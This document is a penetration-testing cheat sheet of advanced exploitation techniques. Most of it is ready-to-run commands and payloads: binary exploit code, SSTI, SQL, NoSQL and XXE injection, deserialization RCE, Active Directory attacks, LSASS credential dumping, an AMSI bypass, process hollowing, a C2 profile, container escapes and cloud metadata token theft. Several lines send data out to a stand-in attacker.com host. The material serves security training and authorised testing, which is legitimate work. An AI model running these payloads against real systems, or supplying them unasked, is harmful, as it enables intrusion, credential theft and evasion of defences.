Advanced Exploitation
Advanced exploitation techniques for experienced penetration testers.
Binary Exploitation
Return-Oriented Programming (ROP)
# ROPgadget
ROPgadget --binary ./vulnerable --rop
# pwntools ROP chain
from pwn import *
elf = ELF('./vulnerable')
rop = ROP(elf)
rop.call('system', ['/bin/sh'])
print(rop.dump())
# Manual ROP chain
p = process('./vulnerable')
p.sendline(b'A' * 100 + p64(pop_rdi) + p64(bin_sh) + p64(system))
Heap Exploitation
# House of Force
# Tcache poisoning
# Fastbin attack
from pwn import *
def tcache_poisoning():
p = process('./heap_vuln')
# Allocate chunks
malloc(0x100) # chunk 0
malloc(0x100) # chunk 1
# Free and create UAF
free(0)
free(1)
# Poison tcache
edit(1, p64(target_address))
# Allocate to target
malloc(0x100)
malloc(0x100) # This allocation is at target_address
Format String Exploitation
# Leak addresses
payload = b'%p.' * 20
# Write arbitrary memory
payload = fmtstr_payload(offset, {target_addr: value})
# Advanced format string
from pwn import *
p = process('./vuln')
writes = {elf.got['exit']: elf.symbols['win']}
payload = fmtstr_payload(6, writes)
p.sendline(payload)
Web Application Advanced Exploitation
Server-Side Template Injection (SSTI)
Jinja2 (Python)
{{ ''.__class__.__mro__[1].__subclasses__() }}
{{ config.__class__.__init__.__globals__['os'].popen('whoami').read() }}
{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() }}
Twig (PHP)
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("whoami")}}
{{['id']|filter('system')}}
Velocity (Java)
#set($x='')
#set($rt=$x.class.forName('java.lang.Runtime'))
#set($chr=$x.class.forName('java.lang.Character'))
#set($str=$x.class.forName('java.lang.String'))
$rt.getRuntime().exec('whoami')
Advanced SQL Injection
-- Time-based blind with binary search
SELECT CASE WHEN (ASCII(SUBSTRING((SELECT password FROM users LIMIT 1),1,1))>64) THEN pg_sleep(5) ELSE pg_sleep(0) END;
-- Boolean-based with substring extraction
SELECT * FROM users WHERE id=1 AND ASCII(SUBSTRING((SELECT password FROM users WHERE username='admin'),1,1))>64;
-- Out-of-band exfiltration (PostgreSQL)
COPY (SELECT password FROM users) TO PROGRAM 'curl https://attacker.com/$(cat)';
-- Error-based extraction (MySQL)
SELECT extractvalue(1,concat(0x7e,(SELECT @@version),0x7e));
SELECT updatexml(1,concat(0x7e,(SELECT user()),0x7e),1);
-- Second-order SQL injection
INSERT INTO temp VALUES ('admin', 'password'' OR ''1''=''1');
-- Later query becomes: SELECT * FROM users WHERE username='admin' AND password='password' OR '1'='1'
-- WAF bypass techniques
SELECT/**/password/**/FROM/**/users;
SELECT password FROM users WHERE 1=1 /*!50000AND*/ username='admin';
SeLeCt password FrOm users;
SELECT password FROM users WHERE username=CHAR(97,100,109,105,110);
NoSQL Injection Advanced
// MongoDB injection
{"username": {"$ne": null}, "password": {"$ne": null}}
{"username": {"$regex": "^admin"}, "password": {"$ne": null}}
{"$where": "this.username == 'admin' && this.password.length > 0"}
// JavaScript injection in MongoDB
{"$where": "function() { return (this.username == 'admin' && sleep(5000)) }"}
// Blind NoSQL injection
for c in string.printable:
payload = {"username": {"$regex": f"^{prefix}{c}"}}
if check_response(payload):
prefix += c
break
Advanced XXE
Blind XXE with DTD
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">
%xxe;
]>
<foo>&exfil;</foo>
evil.dtd
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY % exfil SYSTEM 'http://attacker.com/?x=%file;'>">
%eval;
%exfil;
XXE via SVG upload
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<image xlink:href="expect://whoami"/>
</svg>
XXE via Excel (XLSX) - In xl/workbook.xml
<!DOCTYPE x [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<x>&xxe;</x>
Advanced Deserialization
# Python pickle RCE
import pickle
import os
class RCE:
def __reduce__(self):
return (os.system, ('whoami',))
payload = pickle.dumps(RCE())
Java deserialization gadget chains using ysoserial
java -jar ysoserial.jar CommonsCollections6 'curl http://attacker.com/$(whoami)' | base64
.NET deserialization using ysoserial.net
ysoserial.exe -f BinaryFormatter -g WindowsIdentity -c "cmd /c whoami" -o base64
PHP deserialization
<?php
class Evil {
private $cmd;
function __construct($cmd) {
$this->cmd = $cmd;
}
function __destruct() {
system($this->cmd);
}
}
echo serialize(new Evil('whoami'));
?>
Advanced Post-Exploitation
Lateral Movement
# PSExec alternatives
impacket-psexec domain/user:password@target.com
impacket-smbexec domain/user:password@target.com
impacket-wmiexec domain/user:password@target.com
impacket-atexec domain/user:password@target.com
# Pass-the-Hash
crackmapexec smb 192.168.1.0/24 -u administrator -H NTHASH --shares
crackmapexec smb 192.168.1.0/24 -u administrator -H NTHASH -x whoami
# Overpass-the-Hash
getTGT.py domain/user -hashes :NTHASH
export KRB5CCNAME=user.ccache
impacket-psexec target.com -k -no-pass
# Pass-the-Ticket
getTGT.py domain/user:password
export KRB5CCNAME=user.ccache
impacket-psexec target.com -k -no-pass
# DCOM lateral movement
impacket-dcomexec domain/user:password@target.com
Active Directory Exploitation
# Kerberoasting automated
impacket-GetUserSPNs domain/user:password -dc-ip 10.10.10.10 -request -outputfile kerberoast.txt
# AS-REP Roasting
impacket-GetNPUsers domain/ -usersfile users.txt -dc-ip 10.10.10.10 -format hashcat
# DCSync attack
impacket-secretsdump domain/user:password@dc.domain.com -just-dc-user administrator
# Golden ticket
impacket-ticketer -nthash KRBTGT_HASH -domain-sid DOMAIN_SID -domain domain.com administrator
# Silver ticket
impacket-ticketer -nthash SERVICE_HASH -domain-sid DOMAIN_SID -domain domain.com -spn cifs/target.domain.com administrator
# Constrained delegation abuse
getST.py -spn cifs/target.domain.com -impersonate administrator domain/user:password
# Unconstrained delegation
findDelegation.py domain/user:password
# RBCD (Resource-Based Constrained Delegation)
rbcd.py -delegate-from 'COMPUTER$' -delegate-to 'TARGET$' -action write domain/user:password
# AD CS exploitation
certipy find -u user@domain.com -p password -dc-ip 10.10.10.10
certipy req -u user@domain.com -p password -ca CA-NAME -target ca.domain.com -template ESC1
# PrinterBug + unconstrained delegation
dementor.py -d domain.com -u user -p password ATTACKER DC
Advanced Pivoting
Metasploit autoroute + SOCKS
use post/multi/manage/autoroute
set SESSION 1
run
use auxiliary/server/socks_proxy
set SRVPORT 1080
run
Port forwarding chain
ssh -L 3000:localhost:3000 user@pivot1
ssh -L 5432:database:5432 user@pivot2 -p 3000 -o ProxyCommand="nc localhost 3000"
Memory Dumping and Analysis
# LSASS dumping techniques
# Task Manager method
tasklist | findstr lsass
rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump <lsass_pid> C:\temp\lsass.dmp full
# Procdump
procdump.exe -accepteula -ma lsass.exe lsass.dmp
# Mimikatz sekurlsa
mimikatz.exe "privilege::debug" "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords"
# Pypykatz (offline)
pypykatz lsa minidump lsass.dmp
# Nanodump (EDR evasion)
nanodump.exe --write C:\temp\lsass.dmp
# DPAPI extraction
mimikatz.exe "dpapi::masterkey /in:C:\Users\user\AppData\Roaming\Microsoft\Protect\<SID>\<GUID>"
# Chrome credential extraction
python3 chrome_decrypt.py
# KeePass memory dumping
strings keepass.dmp | grep -A 5 -B 5 "password"
Advanced Evasion Techniques
AV/EDR Evasion
Process hollowing
from ctypes import *
def process_hollowing(target_pe, payload):
# Create suspended process
startupinfo = STARTUPINFO()
process_info = PROCESS_INFORMATION()
CreateProcessA(target_pe, None, None, None, False,
CREATE_SUSPENDED, None, None,
byref(startupinfo), byref(process_info))
# Unmap original image
NtUnmapViewOfSection(process_info.hProcess, image_base)
# Allocate memory
VirtualAllocEx(process_info.hProcess, image_base,
payload_size, MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READWRITE)
# Write payload
WriteProcessMemory(process_info.hProcess, image_base,
payload, payload_size, None)
# Resume thread
ResumeThread(process_info.hThread)
AMSI bypass
$a=[Ref].Assembly.GetTypes();ForEach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}};$d=$c.GetFields('NonPublic,Static');ForEach($e in $d) {if ($e.Name -like "*Context") {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1)
Obfuscation with Invoke-Obfuscation
Invoke-Obfuscation
SET SCRIPTBLOCK Write-Host "Payload"
TOKEN
ALL
1
Shellcode encryption
key = os.urandom(16)
cipher = AES.new(key, AES.MODE_CBC, iv)
encrypted = cipher.encrypt(pad(shellcode, 16))
Command and Control (C2)
Cobalt Strike malleable profile
https-certificate {
set CN "example.com";
set O "Example Corp";
}
http-get {
set uri "/api/v1/updates";
client {
header "User-Agent" "Mozilla/5.0";
metadata {
base64url;
prepend "session=";
header "Cookie";
}
}
}
Container and Cloud Exploitation
Docker Escape
# Check if in container
cat /proc/1/cgroup | grep docker
# Docker socket escape
docker -H unix:///var/run/docker.sock run -v /:/host -it alpine chroot /host /bin/bash
# Privileged container escape
mkdir /tmp/escape
mount -t cgroup -o rdma cgroup /tmp/escape
mkdir /tmp/escape/x
echo 1 > /tmp/escape/x/notify_on_release
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/cmd" > /tmp/escape/release_agent
echo '#!/bin/sh' > /cmd
echo "ps aux > $host_path/output" >> /cmd
chmod a+x /cmd
sh -c "echo \$\$ > /tmp/escape/x/cgroup.procs"
# Kubernetes pod escape
kubectl exec -it pod-name -- /bin/bash
cat /var/run/secrets/kubernetes.io/serviceaccount/token
Cloud Metadata Exploitation
# AWS metadata
curl http://169.254.169.254/latest/meta-data/
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
curl http://169.254.169.254/latest/user-data/
# Azure metadata
curl -H "Metadata: true" "http://169.254.169.254/metadata/instance?api-version=2021-02-01"
curl -H "Metadata: true" "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"
# GCP metadata
curl "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" -H "Metadata-Flavor: Google"
# SSRF to metadata
curl "https://target.com/proxy?url=http://169.254.169.254/latest/meta-data/"